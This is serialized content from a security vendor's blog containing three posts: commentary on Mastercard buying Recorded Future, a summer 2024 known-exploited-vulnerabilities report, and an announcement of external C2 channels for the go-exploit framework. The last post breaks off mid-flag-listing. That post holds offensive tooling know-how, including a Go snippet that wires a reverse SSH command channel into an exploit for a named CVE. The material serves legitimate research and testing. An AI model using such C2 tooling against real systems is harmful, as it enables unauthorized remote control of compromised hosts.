vs ",[47,66215,66218],{"href":66216,"rel":66217},"https:\u002F\u002Fusa.visa.com",[51],"Visa"," and others.",[18,66221,66222],{},[68,66223],{":width":10862,"alt":66224,"src":66225},"Master Card Acquires Recorded Future","\u002Fblog\u002Fmastercard-recorded-future-acquisition\u002Fmastercard-recorded-future.png",[18,66227,29859,66228,66233],{},[47,66229,66232],{"href":66230,"rel":66231},"https:\u002F\u002Fpitchbook.com",[51],"Pitchbook",", Recorded Future had over $1.1B in investment pumped into the business between funding and the sale to Insight Partners a few years ago.",[18,66235,66236],{},"But what does this mean for the broader threat intelligence market and cybersecurity as a whole? This acquisition marks a pivotal moment with some specific trends:",[22,66238,66239,66242,66245],{},[25,66240,66241],{},"The broader tech sector has been working to bump up valuation and acquisition pricing this year.",[25,66243,66244],{},"The financial industry needs to fill the gap of robust cyber tooling with the advanced capabilities of premier threat intelligence providers such as Recorded Future.",[25,66246,66247],{},"Financial institutions are increasingly taking an active role in cybersecurity, recognizing that threats to digital payments are threats to their core business.",[18,66249,66250],{},"This gives Mastercard a first-mover advantage in rallying around intelligence as a solution. It signals that threat intelligence, in all forms, has risen to the top of the food chain as an essential part of any major SOC - moving in the direction of collective intelligence that's integrated into a cyber-centric, predictive approach.",[61,66252,66254],{"id":66253},"what-are-the-implications","What are the Implications?",[18,66256,66257],{},"The Recorded Future acquisition isn't just MC bolstering its own security capabilities—it's a strategic move to position the company as a leader in cybersecurity for the financial sector and beyond.",[18,66259,66260],{},"Any cybersecurity technology that Mastercard evaluates to potentially bring into its portfolio is going to be intrinsically linked somehow to reducing the risk around fraud, and around the probability of breaches occurring.",[18,66262,66263,66268,66269,66273],{},[47,66264,66267],{"href":66265,"rel":66266},"https:\u002F\u002Fwww.cnbc.com\u002F2024\u002F09\u002F12\u002Fwhy-credit-card-fraud-alerts-are-rising.html",[51],"In fact, according to Experian, about 60% of credit card holders in 2023 experienced some sort of attempted fraud."," And global card losses attributed to fraud reached ",[47,66270,66272],{"href":66265,"rel":66271},[51],"$33 billion in 2022",", according to payments industry research company Nilson Report, with the U.S. market representing roughly 40% of losses. It has forecast a persistent threat that could reach nearly $400 billion in card fraud in the decade to 2032.",[22,66275,66276,66279],{},[25,66277,66278],{},"So, given that payments companies are responsible for securing transactions in the digital economy as well as POS transactions, it would certainly bolster any merchant’s security if they knew that: Mastercard was providing added cyber tech and insights to enhance how it can protect transactions with more precision.\nMastercard would be rolling new technology solutions to merchants and larger enterprise customers that could help proactively reduce the risk of compromise.",[25,66280,66281,66282,66287],{},"Mastercard has done this in the past - notably with the ",[47,66283,66286],{"href":66284,"rel":66285},"https:\u002F\u002Fwww.mastercard.com\u002Fnews\u002Fpress\u002F2019\u002Fdecember\u002Fmastercard-acquires-riskrecon-to-enhance-cybersecurity-capabilities\u002F",[51],"acquisition of RiskRecon in 2020",", which used internet-based intelligence to measure and score risk against internet-facing assets which organizations either were or were not aware of. I was part of this acquisition, and it certainly was interesting to see the level of thinking Mastercard brought to that process.",[18,66289,66290],{},"This recent movecould lead to more customized and targeted solutions. One could envision new offerings like AI-based analysis and specialized intelligence products that integrate Recorded Future's intelligence with existing datasets from its cybersecurity and fraud prevention services.",[18,66292,66293],{},"Surely product managers are salivating over the integration,new product discussions and possibilities they can dream up. Although, like most transactions of this size, the business will remain its own operating entity under Mastercard to accommodate the large installed base.",[61,66295,66297],{"id":66296},"whats-this-mean-for-the-threat-intelligence-market","What’s This Mean for the Threat Intelligence Market?",[18,66299,66300,66301],{},"With the increased awareness and appetite for threat intelligence solutions on a global level, this acquisition represents an opportunity for other non-traditional cyber-cyber acquisitions. That’s usually kind of boring anyway because any cyber product company can find a way to integrate a new cyber solution and its people. That said, companies like ",[47,66302,66305],{"href":66303,"rel":66304},"https:\u002F\u002Fwww.securityweek.com\u002Frapid7-acquires-threat-intelligence-firm-intsights-335-million\u002F",[51],"Rapid7 recognized this need about three years ago when they acquired IntSights.",[18,66307,66308,66309,66314],{},"In fact, according to a ",[47,66310,66313],{"href":66311,"rel":66312},"https:\u002F\u002Fwww.gartner.com\u002Fen\u002Fdocuments\u002F4343699",[51],"Gartner report",", the global threat intelligence market is projected to grow at a CAGR of 15.5% in 2023 (which seems low) and sat last year at a range between approximately $3B and $11 billion and is expected to grow to $19.5 billion by 2028. (which also seems low).",[18,66316,66317],{},"This acquisition pushes the value of the threat intelligence market into other non-cyber markets in a way that connects cyber technology to the fabric of business operations.",[18,66319,66320],{},"However, this could be the start of a consolidation of sorts of expertise and resources - Mastercard gains access to deep expertise in threat intelligence, proprietary machine learning models and as stated earlier, massive-scale data sets.",[18,66322,66323],{},"This consolidation should lead to more advanced threat detection and response solutions that benefit not only Mastercard's customers but potentially the entire ecosystem if shared more broadly.",[18,66325,66326],{},"Most large \u002F publicly-traded cybersecurity companies already have a significant presence in the threat intelligence market. That said, this will likely prompt other financial institutions and large enterprises to consider similar moves, either by acquiring or partnering with threat intelligence companies.",[18,66328,66329],{},"I’d expect this transaction might lead to a substantial surge in market activity, driving significant innovation at organizations like Visa and Discover or even Experian, which already has an enormous partnership with Security Scorecard.",[18,66331,66332,66333,66338],{},"According to the Ponemon Institute, ",[47,66334,66337],{"href":66335,"rel":66336},"https:\u002F\u002Fwww.ponemon.org\u002Fresearch\u002Fponemon-library\u002F",[51],"64% of organizations globally"," cite the integration of threat intelligence into their security operations as a top priority, which makes sense because the smarter any team or tool can get, the better an organization can protect itself.",[18,66340,66341],{},"Smaller and independent threat intelligence vendors may feel the pressure to innovate faster and provide more specialized or niche services to stand out in a market where bigger players like Mastercard are now entering the fray with substantial resources and reach.",[18,66343,66344],{},"By integrating Recorded Future's advanced threat intelligence capabilities, Mastercard can offer more comprehensive and proactive \u002F predictive security solutions to its customers, significantly enhancing its value proposition.",[61,66346,66348],{"id":66347},"but-remember-this","But Remember This",[18,66350,66351],{},"Not all threat intelligence solutions are created equally. Cliche yes, but true. There’s a lot of unpacking to do with what Recorded Future has under the hood. They have amassed a significant amount of data over the years and through its up and down growth cycles.",[18,66353,66354],{},"Formatting, programming languages, third-party inputs, actionability of the data and integration are just the short-list of challenges that will arise when the Mastercard team pulls this apart to build out entirely new solutions. This is also true whenmaintaining significant deployments in the enterprise and for its Federal customers - - meaning there are national security considerations here.",[18,66356,66357,66358,66363],{},"Do we want the protection of our nation’s infrastructure decided by a for-profit, publicly traded payments company? Because that’s real now. Recorded Future also has made its own acquisitions that it had to put integration cycles into, like ",[47,66359,66362],{"href":66360,"rel":66361},"https:\u002F\u002Fsecuritytrails.com\u002Fblog\u002Fsecuritytrails-acquired-by-recordedfuture",[51],"Security Trails",", so it’s not just an organically grown intelligence platform \u002F IP over time that Mastercard is getting.",[18,66365,66366],{},"What’s imperative today is that operators within cybersecurity teams need intelligence to be in a format that is easily consumable, simple to integrate \u002F make sense of and autonomous given the heavy signal-to-noise load every team gets from every tool in its SOC.",[18,66368,66369],{},"Where AI was a late-to-the-party add to Recorded Future’s Marketing message to make it sound faster, less clunky and not just intelligence reports that require human interpretation, its part band-aid and part real at the same time.",[18,66371,66372],{},"However, AI is not a standalone answer on its own, or if you can spell the words “AI.” It speeds up many processes but it isn’t the solve-all technology in every case. Threat intelligence should inform machine-based action around triage, response and risk reduction.",[18,66374,66375],{},"In summary, Mastercard forking over $2.65B for Recorded Future which is a positive step on solving what could be thought of as a multi-trillion dollar+ problem if you bundle global fraud and the costs associated with breaches - leveraging data vs people and tools which is smart. There is a long-term impact that might be felt as a result of this transaction that could help align into a new approach for the financial industry’s fight vs cybercrime.",{"title":219,"searchDepth":220,"depth":220,"links":66377},[66378,66379,66380],{"id":66253,"depth":220,"text":66254},{"id":66296,"depth":220,"text":66297},{"id":66347,"depth":220,"text":66348},"2024-09-13","Recorded Future was acquired by Mastercard today for $2.65B, which is an encouraging macro indicator for the threat intelligence market and adjacent markets.",{"slug":66384},"mastercard-recorded-future-acquisition","\u002Fblog\u002Fmastercard-recorded-future-acquisition",{"title":66201,"description":66382},"blog\u002Fmastercard-recorded-future-acquisition","X_Vyol823ECX_riPLtuY2-4ae3WFmrvkO7v8U00kcoc",{"id":66390,"title":66391,"articles":66392,"authors":66397,"body":66399,"date":64897,"description":66592,"extension":234,"image":7,"link":7,"meta":66593,"navigation":237,"path":66595,"seo":66596,"series":7,"stem":66597,"subtype":7,"tags":66598,"__hash__":66599},"blog\u002Fblog\u002Fkev-report-summer-2024.md","VulnCheck Known Exploited Vulnerabilities Report - Summer 2024",[66393],{"title":66394,"source":61436,"link":66395,"date":66396},"Risky Biz News: US says RT moved into cyber and intelligence-gathering territory","https:\u002F\u002Fnews.risky.biz\u002Frisky-biz-news-us-says-rt-moved-into-cyber-and-intelligence-gathering-territory\u002F","2024-09-16",[66398],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":66400,"toc":66589},[66401,66404,66424,66426,66440,66444,66449,66452,66478,66482,66488,66491,66494,66497,66501,66507,66513,66516,66520,66526,66529,66532,66536,66541,66544,66547,66550,66565,66567,66578,66580,66582,66584],[18,66402,66403],{},"Before diving into this month's Known Exploited Vulnerabilities update, I'd like to note that this post covers data from June, July, and August so we are calling it a Summer report. This is due prioritizing other research over the last few month that we’ve been focused on publishing, which are worth a read:",[22,66405,66406,66412,66417],{},[25,66407,66408],{},[47,66409,66411],{"href":41691,"rel":66410},[51],"State of Exploitation 1H-2024",[25,66413,66414],{},[47,66415,64661],{"href":54458,"rel":66416},[51],[25,66418,66419],{},[47,66420,66423],{"href":66421,"rel":66422},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fmetasploit-kev",[51],"Weaponized Vulnerabilities Deserve a Seat at the Prioritization Table",[1920,66425,20],{"id":3520},[22,66427,66428,66431,66434,66437],{},[25,66429,66430],{},"VulnCheck captured exploitation evidence for 158 vulnerabilities with initial evidence emerging during June, July and August.",[25,66432,66433],{},"The evidence of known exploitation was collected from over 35 different sources.",[25,66435,66436],{},"Software that topped the list of new Known Exploited Vulnerabilities (KEVs) includes Microsoft Windows, Apache OFBiz, PHP Everywhere, OSGeo GeoServer, ServiceNow, Google Chromium, and the Linux Kernel.",[25,66438,66439],{},"CISA added 42 CVEs to their KEV list during June, July and August. For 71.4% (30\u002F42) of those vulnerabilities, VulnCheck provided evidence earlier than CISA.",[1920,66441,66443],{"id":66442},"summer-vendor-and-product-breakdown","Summer Vendor and Product Breakdown",[18,66445,66446],{},[68,66447],{":width":10862,"alt":58618,"src":66448},"\u002Fblog\u002Fkev-report-summer-2024\u002Fvulncheck-august-exploitation.png",[18,66450,66451],{},"The 158 CVEs with known exploitation evidence were associated with 119 software suppliers across 136 unique products. The following software topped the list with two or more CVEs with known exploitation:",[22,66453,66454,66457,66460,66463,66466,66469,66472,66475],{},[25,66455,66456],{},"Microsoft Windows (10)",[25,66458,66459],{},"Apache OFBiz (3)",[25,66461,66462],{},"PHP Everywhere (3)",[25,66464,66465],{},"OSGeo GeoServer (3)",[25,66467,66468],{},"Totolink (2)",[25,66470,66471],{},"ServiceNow (2)",[25,66473,66474],{},"Google Chromium (2)",[25,66476,66477],{},"Linux Kernel (2)",[1920,66479,66481],{"id":66480},"summer-trends-in-vulnerability-exploitation-disclosure","Summer Trends in Vulnerability Exploitation Disclosure",[18,66483,66484],{},[68,66485],{":width":10862,"alt":66486,"src":66487},"VulnCheck KEV Trends","\u002Fblog\u002Fkev-report-summer-2024\u002Fvulncheck-kev-trends.png",[18,66489,66490],{},"Vulnerability exploitation disclosure occasionally appears to spike, as evidence of exploitation is reported publicly at different times or when we onboard new sources like ShadowServer.",[18,66492,66493],{},"We expect the baseline of new KEVs to range between 30-50 vulnerabilities per month, with occasional spikes around quarterly reports in October\u002FNovember and the start of the new year. A increasing trend towards an increase in public disclosure of exploitation evidence appears to be continuing along with the growth in vulnerability disclosure, which we encourage, as it enhances organizations' visibility into vulnerability exploitation.",[18,66495,66496],{},"If you use VulnCheck KEV, you might have noticed an overall increase in the total number of Known Exploited Vulnerabilities beyond just the new evidence we captured. This is due to our ongoing efforts to capture historical exploitation evidence. We hope to write more about this soon to provide some clarity on this topic.",[1920,66498,66500],{"id":66499},"who-was-the-first-to-report-the-exploited-vulnerabilities","Who Was the First to Report the Exploited Vulnerabilities?",[18,66502,66503],{},[68,66504],{":width":10862,"alt":66505,"src":66506},"VulnCheck KEV Sources","\u002Fblog\u002Fkev-report-summer-2024\u002Fvulncheck-kev-august-source.png",[18,66508,66509,66510,59],{},"We collected exploitation evidence from over 35 sources. Notably, F5 published two reports, and CISA released a report titled \"North Korea Cyber Group Conducts Global Espionage Campaign,\" both with significant numbers of CVEs. Additionally, several vulnerabilities on the CISA KEV list were disclosed simultaneously with the vendors, such as Microsoft. For a deeper dive into these details, you can access the full dataset of the VulnCheck KEV ",[47,66511,305],{"href":2871,"rel":66512},[51],[18,66514,66515],{},"It's worth noting that we audited and added evidence from Patchstack and Wordfence over the last few months. Both these projects track wordpress plugin vulnerabilities and exploitation so VulnCheck KEV now has much better coverage for wordpress plug-ins thanks to these sources.",[1920,66517,66519],{"id":66518},"how-did-vulncheck-kev-do-compared-with-cisa-kev","How did VulnCheck KEV do compared with CISA KEV?",[18,66521,66522],{},[68,66523],{":width":10862,"alt":66524,"src":66525},"VulnCheck KEV vs. CISA KEV","\u002Fblog\u002Fkev-report-summer-2024\u002Ffirst-to-kev.png",[18,66527,66528],{},"Between June and August, VulnCheck added 158 CVEs to its Known Exploited Vulnerabilities (KEV) list, while CISA added 42 CVEs to their KEV list. For 30 of these 42 (71.4%) vulnerabilities, VulnCheck provided evidence earlier than CISA, enabling organizations to gain early visibility into vulnerabilities that later appear on the CISA KEV list.",[18,66530,66531],{},"The 12 vulnerabilities disclosed by CISA KEV included OSgeo GeoServer, Dahua IP Camera, Microsoft Project, Microsoft Windows (7),Versa Director (1) and Roundcube (1). With the exception of Dahua, OSgeo GeoServer and Roundcube, these vulnerabilities were disclosed within 2 days of the exploitation evidence. The Microsoft vulnerabilities were also disclosed at the same time through Microsoft MSRC which we also capture in VulnCheck KEV.",[1920,66533,66535],{"id":66534},"a-quick-peek-into-scoring-systems-mapped-to-known-exploitation","A Quick peek into Scoring Systems Mapped to Known Exploitation",[18,66537,66538],{},[68,66539],{":width":10862,"alt":66524,"src":66540},"\u002Fblog\u002Fkev-report-summer-2024\u002Fkev-cvss-epss.png",[18,66542,66543],{},"We've continued to analyze Known Exploitation in relation to vulnerability scoring systems, specifically CVSS and EPSS. Our goal is to gain insights into how these scoring systems can better reflect known exploitation and emerging threats.",[18,66545,66546],{},"To enhance visibility into CVSS and EPSS, I created a plot of known exploitation mapped to these systems. Yellow indicates higher density, while purple represents lower density of CVEs associated with known exploitation.\nBy applying an EPSS score (Early September scoring) of 0.1 or a 10% probability of exploitation or higher, we find that 40 CVEs (25.3%) align with Known Exploitation captured for the first time during June, July and August. With a CVSS-BT score of 9 or higher, 57 CVEs (36.1%) map to Known Exploitation. We plan to explore scoring systems further to provide deeper insights when we have more time.",[18,66548,66549],{},"Related to the topic of vulnerability prioritization, ee suggest exploring these articles on the topic of vulnerability prioritization:",[22,66551,66552,66558],{},[25,66553,66554,66555],{},"Taking an Evidence Based Approach to Prioritization: ",[47,66556,54458],{"href":54458,"rel":66557},[51],[25,66559,66560,66561],{},"Do We Need Yet Another Vulnerability Scoring Systems? (Ben Edwards, Bitsight): ",[47,66562,66563],{"href":66563,"rel":66564},"https:\u002F\u002Fwww.bitsight.com\u002Fblog\u002Fdo-we-need-yet-another-vulnerability-scoring-system-if-its-ssvc-thats-resounding-yass",[51],[1920,66566,64665],{"id":64664},[18,66568,64668,66569,64672,66572,982,66575,59],{},[47,66570,28667],{"href":40745,"rel":66571},[51],[47,66573,1233],{"href":2871,"rel":66574},[51],[47,66576,40672],{"href":40670,"rel":66577},[51],[61,66579,202],{"id":201},[18,66581,205],{},[18,66583,208],{},[18,66585,211,66586,217],{},[47,66587,216],{"href":214,"rel":66588},[51],{"title":219,"searchDepth":220,"depth":220,"links":66590},[66591],{"id":201,"depth":220,"text":202},"During June, July, and August, we captured exploitation evidence for 158 vulnerabilities, with initial evidence emerging within this period for the first time. The evidence was collected from over 35 different sources.",{"slug":66594},"kev-report-summer-2024","\u002Fblog\u002Fkev-report-summer-2024",{"title":66391,"description":66592},"blog\u002Fkev-report-summer-2024",[1279],"RM3fQJfHzYMtsVeYUnv585SammTtmHSssCiZ69ZlJq4",{"id":66601,"title":66602,"articles":7,"authors":66603,"body":66605,"date":64874,"description":67469,"extension":234,"image":7,"link":7,"meta":67470,"navigation":237,"path":67472,"seo":67473,"series":7,"stem":67474,"subtype":7,"tags":7,"__hash__":67475},"blog\u002Fblog\u002Fgo-exploit-external-c2s.md","VulnCheck go-exploit External C2s",[66604],{"name":4410,"avatar":4411,"link":4412,"linkName":4413},{"type":15,"value":66606,"toc":67464},[66607,66610,66624,66630,66638,66653,66656,66676,66680,66689,66717,66720,66723,66742,66745,66984,66987,67003,67011,67014,67127,67130,67429,67432,67436,67439,67442,67446,67449,67452,67461],[263,66608],{":list":66609,"ico":266,"title":66602},"[\"New go-exploit feature in 1.25.0 allows anyone to easily develop and integrate their own C2.\",\"Example of an SSH-based C2 integrated in an exploit for CVE-2024-38856.\",\"The future of integrating C2 frameworks and interactions.\"]",[18,66611,66612,66613,66617,66618,66623],{},"The Initial Access Intelligence team is happy to announce go-exploit external C2s. This feature enables community members to create C2 channels and payloads with direct integration into the ",[47,66614,66616],{"href":14297,"rel":66615},[51],"go-exploit framework",". The changes initially pushed in ",[47,66619,66622],{"href":66620,"rel":66621},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fgo-exploit\u002Freleases\u002Ftag\u002Fv1.25.0",[51],"1.25.0"," give go-exploit the flexibility to import external C2 modules and define multiple types of external C2s. For example, the following demonstrates an SSH-based C2 integrated into a go-exploit for CVE-2024-38856 from a third-party repository:",[18,66625,66626],{},[68,66627],{":width":10862,"alt":66628,"src":66629},"go-exploit SSH Server External C2","\u002Fblog\u002Fgo-exploit-external-c2s\u002Fexternal-c2-ssh-server.png",[18,66631,66632,66633,66637],{},"One of ",[47,66634,66636],{"href":14297,"rel":66635},[51],"go-exploit’s"," goals is the intentional separation of duties. Creating an exploitation framework is a hard problem, creating a good payload or implant is another hard problem.Making secure channels to communicate with implants is difficult, how to dynamically modify payloads for evasion is also difficult, and how to manage them is another issue, further increasing the complexity and surrounding specific projects. This complexity balloons when you try to combine these components to solve every post-exploitation corner case and open-source these systems. With go-exploit, we’ve decided to stay focused on the goals of creating a flexible framework-driven reproduction of exploits.",[18,66639,66640,66641,66646,66647,66652],{},"In practice, this means that the framework keeps the internal collection of exploit payloads & C2 interactions down to a very simple, minimal and practical set, with trivial reverse shells, bind shells, droppers, and a few other in-memory use case-specific goodies that the team considers to be the \"bare minimum\" for use cases of N-day development. While this might work great for someone conducting penetration tests, the post-exploitation experience may be too barebones and oftentimes just a thin wrapper around calls to shell execution. This is not ideal for teams more concerned about stealth and is more hesitant to throw around exploits that don't explicitly use in-house developed implants where the Indicators of Compromise (IoCs) are a primary concern or payloads don't interact nicely with their operation management framework. Luckily, VulnCheck recognizes this potential limitation and has always offered a ",[47,66642,66645],{"href":66643,"rel":66644},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fgo-exploit\u002Fblob\u002Fmain\u002Fdocs\u002Fc2.md#using--o",[51],"flag for informing the framework that the exploit handles the payload handling externally"," or via ",[47,66648,66651],{"href":66649,"rel":66650},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fgo-exploit\u002Fblob\u002Fmain\u002Fdocs\u002Fc2.md#using-httpservefile",[51],"served HTTP files",", which allows any payloads to trigger from the context of go-exploit but no callbacks get handled by the framework. That said, this isn’t always enough for real-life complex use cases and doesn't fully solve the other issues laid out.",[18,66654,66655],{},"Looking to the future, the team identified a few special requirements and wants for practitioners that other frameworks aren't great at supporting as first-class citizens:",[22,66657,66658,66664,66670],{},[25,66659,66660,66663],{},[295,66661,66662],{},"Decoupling exploitation"," - Exploitation is its own step that shouldn't be as concerned about all the components of payload that are delivered in many cases. The team wants to allow for exploitation to slot in when needed or when that first foothold isn't easily available to teams. Exact use cases vary for everyone and exploitation should be flexible.",[25,66665,66666,66669],{},[295,66667,66668],{},"Tighter C2 framework integration"," - Being able to communicate with C2 frameworks and payload-catching components should be supported when possible to allow for the communication of exploitation steps and interaction with C2 frameworks.",[25,66671,66672,66675],{},[295,66673,66674],{},"Experimentation"," - Strange stuff works, and many other frameworks make it too hard to experiment. Letting folks trivially define their own payloads and even the ability to catch the callbacks with their own tools from exploits written with go-exploit are primary use cases.",[61,66677,66679],{"id":66678},"hows-it-used-and-why-decouple","How's it used and why decouple?",[18,66681,66682,66683,66688],{},"At the moment, VulnCheck provides a repository for ",[47,66684,66687],{"href":66685,"rel":66686},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fexternal-c2-experiments\u002F",[51],"External C2 Experiments",", which stores:",[22,66690,66691,66704],{},[25,66692,66693,66698,66699,59],{},[47,66694,66697],{"href":66695,"rel":66696},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fexternal-c2-experiments\u002Fblob\u002Fmain\u002Fexample\u002Fexternal.go",[51],"Examples & demonstrations"," of how to create a new external C2, as well as ",[47,66700,66703],{"href":66701,"rel":66702},"https:\u002F\u002Fpkg.go.dev\u002Fgithub.com\u002Fvulncheck-oss\u002Fgo-exploit@v1.25.0\u002Fc2\u002Fexternal",[51],"Go package documentation for the API",[25,66705,66706,66707,982,66712,66716],{},"Full implementations of C2 channels & demonstration payloads for use with go-exploit that the team believes are great but not quite worthy of fitting the goal of having a \"minimal\" set, such as ",[47,66708,66711],{"href":66709,"rel":66710},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fexternal-c2-experiments\u002Fblob\u002Fmain\u002Fssh\u002FREADME.md",[51],"our reverse SSH implementation",[47,66713,11736],{"href":66714,"rel":66715},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fexternal-c2-experiments\u002Ftree\u002Fmain\u002Fssh\u002Fpayload",[51]," that can deploy a \"reverse SSH\" session that executes commands from the SSH server to the SSH client that represents the exploited target.",[18,66718,66719],{},"This decoupling allows anyone who wants to develop a complex payload with evasion and C2 channel to create their own repository a-la our experiments repository or through a private project when teams want to keep components private, leaving the framework itself to focus on accelerating the speed and quality of exploits versus getting bogged down in the herculean effort of all the other steps. Then, after all that hard work, simply define a new C2 type in the target exploit and be off to the races. For an example of how simple it is to add the reverse SSH C2 to a go-exploit exploit, see below.",[18,66721,66722],{},"Add an import for the C2 module:",[1354,66724,66726],{"className":19022,"code":66725,"language":19024,"meta":219,"style":219},"import c2ssh \"github.com\u002Fvulncheck-oss\u002Fexternal-c2-experiments\u002Fssh\" \n",[886,66727,66728],{"__ignoreMap":219},[1373,66729,66730,66732,66735,66737,66740],{"class":1375,"line":1376},[1373,66731,19043],{"class":4636},[1373,66733,66734],{"class":4640}," c2ssh ",[1373,66736,183],{"class":1387},[1373,66738,66739],{"class":19053},"github.com\u002Fvulncheck-oss\u002Fexternal-c2-experiments\u002Fssh",[1373,66741,19057],{"class":1387},[18,66743,66744],{},"Then in the go-exploit project adding support to a exploit as follows:",[1354,66746,66748],{"className":19022,"code":66747,"language":19024,"meta":219,"style":219},"ext := external.GetInstance(c2ssh.Name)\nc2ssh.Configure(ext)\nsupportedC2 := []c2.Impl{\n c2ssh.SSHServer,\n c2.SimpleShellServer,\n}\n\nconf := config.NewRemoteExploit(\n config.ImplementedFeatures{AssetDetection: false, VersionScanning: false, Exploitation: false},\n config.CodeExecution, supportedC2, \"\", []string{},\n []string{}, \"\", \"HTTP\", 8080)\nsploit := ExternalSSHTest{}\nexploit.RunProgram(sploit, conf)\n",[886,66749,66750,66776,66792,66811,66823,66834,66838,66842,66860,66899,66926,66953,66964],{"__ignoreMap":219},[1373,66751,66752,66755,66757,66760,66762,66765,66767,66770,66772,66774],{"class":1375,"line":1376},[1373,66753,66754],{"class":4640},"ext ",[1373,66756,20584],{"class":1397},[1373,66758,66759],{"class":4640}," external",[1373,66761,59],{"class":1383},[1373,66763,66764],{"class":7297},"GetInstance",[1373,66766,1384],{"class":1383},[1373,66768,66769],{"class":4640},"c2ssh",[1373,66771,59],{"class":1383},[1373,66773,30775],{"class":4640},[1373,66775,11875],{"class":1383},[1373,66777,66778,66780,66782,66785,66787,66790],{"class":1375,"line":220},[1373,66779,66769],{"class":4640},[1373,66781,59],{"class":1383},[1373,66783,66784],{"class":7297},"Configure",[1373,66786,1384],{"class":1383},[1373,66788,66789],{"class":4640},"ext",[1373,66791,11875],{"class":1383},[1373,66793,66794,66797,66799,66802,66804,66806,66809],{"class":1375,"line":1266},[1373,66795,66796],{"class":4640},"supportedC2 ",[1373,66798,20584],{"class":1397},[1373,66800,66801],{"class":1383}," []",[1373,66803,26421],{"class":14938},[1373,66805,59],{"class":1383},[1373,66807,66808],{"class":14938},"Impl",[1373,66810,8904],{"class":1383},[1373,66812,66813,66816,66818,66821],{"class":1375,"line":1852},[1373,66814,66815],{"class":4640}," c2ssh",[1373,66817,59],{"class":1383},[1373,66819,66820],{"class":4640},"SSHServer",[1373,66822,9062],{"class":1383},[1373,66824,66825,66828,66830,66832],{"class":1375,"line":4692},[1373,66826,66827],{"class":4640}," c2",[1373,66829,59],{"class":1383},[1373,66831,38204],{"class":4640},[1373,66833,9062],{"class":1383},[1373,66835,66836],{"class":1375,"line":4724},[1373,66837,1855],{"class":1383},[1373,66839,66840],{"class":1375,"line":4756},[1373,66841,6520],{"emptyLinePlaceholder":237},[1373,66843,66844,66847,66849,66852,66854,66857],{"class":1375,"line":4768},[1373,66845,66846],{"class":4640},"conf ",[1373,66848,20584],{"class":1397},[1373,66850,66851],{"class":4640}," config",[1373,66853,59],{"class":1383},[1373,66855,66856],{"class":7297},"NewRemoteExploit",[1373,66858,66859],{"class":1383},"(\n",[1373,66861,66862,66865,66867,66870,66872,66875,66877,66879,66881,66884,66886,66888,66890,66893,66895,66897],{"class":1375,"line":4792},[1373,66863,66864],{"class":14938}," config",[1373,66866,59],{"class":1383},[1373,66868,66869],{"class":14938},"ImplementedFeatures",[1373,66871,9149],{"class":1383},[1373,66873,66874],{"class":4640},"AssetDetection",[1373,66876,4606],{"class":1383},[1373,66878,16311],{"class":14985},[1373,66880,5437],{"class":1383},[1373,66882,66883],{"class":4640}," VersionScanning",[1373,66885,4606],{"class":1383},[1373,66887,16311],{"class":14985},[1373,66889,5437],{"class":1383},[1373,66891,66892],{"class":4640}," Exploitation",[1373,66894,4606],{"class":1383},[1373,66896,16311],{"class":14985},[1373,66898,22429],{"class":1383},[1373,66900,66901,66903,66905,66908,66910,66913,66915,66917,66919,66921,66923],{"class":1375,"line":4798},[1373,66902,66864],{"class":4640},[1373,66904,59],{"class":1383},[1373,66906,66907],{"class":4640},"CodeExecution",[1373,66909,5437],{"class":1383},[1373,66911,66912],{"class":4640}," supportedC2",[1373,66914,5437],{"class":1383},[1373,66916,16579],{"class":1387},[1373,66918,5437],{"class":1383},[1373,66920,66801],{"class":1383},[1373,66922,15752],{"class":7293},[1373,66924,66925],{"class":1383},"{},\n",[1373,66927,66928,66931,66933,66936,66938,66940,66942,66944,66946,66948,66951],{"class":1375,"line":4806},[1373,66929,66930],{"class":1383}," []",[1373,66932,15752],{"class":7293},[1373,66934,66935],{"class":1383},"{},",[1373,66937,16579],{"class":1387},[1373,66939,5437],{"class":1383},[1373,66941,4883],{"class":1387},[1373,66943,6290],{"class":1391},[1373,66945,183],{"class":1387},[1373,66947,5437],{"class":1383},[1373,66949,66950],{"class":5467}," 8080",[1373,66952,11875],{"class":1383},[1373,66954,66955,66957,66959,66962],{"class":1375,"line":4817},[1373,66956,38094],{"class":4640},[1373,66958,20584],{"class":1397},[1373,66960,66961],{"class":14938}," ExternalSSHTest",[1373,66963,20595],{"class":1383},[1373,66965,66966,66968,66970,66973,66975,66978,66980,66982],{"class":1375,"line":4825},[1373,66967,22852],{"class":4640},[1373,66969,59],{"class":1383},[1373,66971,66972],{"class":7297},"RunProgram",[1373,66974,1384],{"class":1383},[1373,66976,66977],{"class":4640},"sploit",[1373,66979,5437],{"class":1383},[1373,66981,20633],{"class":4640},[1373,66983,11875],{"class":1383},[18,66985,66986],{},"In the prior snippet, you can see an external C2 defined, added the supported C2 structure, and passed like normal. No other go-exploit modification is required to learn about the server side component.",[18,66988,66989,66990,66993,66994,66997,66998,59],{},"A few things to keep in mind are that the exploit payload ",[1131,66991,66992],{},"must"," be C2 aware and can't make assumptions that the communications channel has support in the ",[886,66995,66996],{},"go-exploit\u002Fpayload"," types. Because of this, the team created an example of a reverse SSH shell that implements a basic C2 to match close to the other internal minimal set examples: ",[47,66999,67002],{"href":67000,"rel":67001},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fexternal-c2-experiments\u002Fblob\u002Fmain\u002Fssh\u002Fpayload\u002Freverse_shell\u002Freverse_shell.go",[51],"ssh\u002Fpayload\u002Freverse_shell",[18,67004,67005,67006,59],{},"The team has documented the steps for full usage in each of the ",[47,67007,67010],{"href":67008,"rel":67009},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fexternal-c2-experiments\u002Ftree\u002Fmain\u002Fssh#external-c2-ssh",[51],"experiment’s directories",[18,67012,67013],{},"A side-effect of this is that this allows for go-exploit to inherit the command line flag arguments without any changes to the exploit. For the preceding, you suddenly have access to the following flags for free:",[1354,67015,67017],{"className":31740,"code":67016,"language":2186,"meta":219,"style":219},"-SSHShellServer.command string\n Run a single command and exit the payload.\n-SSHShellServer.heartbeat\n Print heartbeat checkins from the c2\n-SSHShellServer.interactive\n Run the commands in an 